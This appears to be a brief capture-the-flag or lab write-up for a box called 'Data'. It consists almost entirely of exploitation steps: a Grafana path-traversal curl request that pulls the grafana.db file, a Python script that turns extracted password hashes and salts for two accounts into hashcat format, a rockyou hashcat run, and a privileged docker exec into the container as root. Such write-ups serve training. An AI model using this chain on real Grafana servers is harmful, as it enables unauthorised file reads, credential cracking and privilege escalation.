Data (easy)
Last updated
Last updated
curl --path-as-is http://10.10.68.81:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.dbimport base64
users = [
"admin@localhost|7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8|YObSoLj55S",
"boris@data.vl|dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8|LCBhdtJWjl"
]
def main():
for user in users:
userProperties = user.split("|");
email = userProperties[0];
hexHash = userProperties[1];
salt = userProperties[2];
decodedHash = bytes.fromhex(hexHash)
hashB64 = base64.b64encode(decodedHash).decode('utf-8')
saltB64 = base64.b64encode(bytes(salt, 'utf-8')).decode('utf-8')
print(f"sha256:10000:{saltB64}:{hashB64}")
if __name__ == "__main__":
main()python3 ./decode.py > hash
sudo hashcat ./hash /usr/share/wordlists/rockyou.txtsudo docker exec --privileged -i -u root -t grafana /bin/bash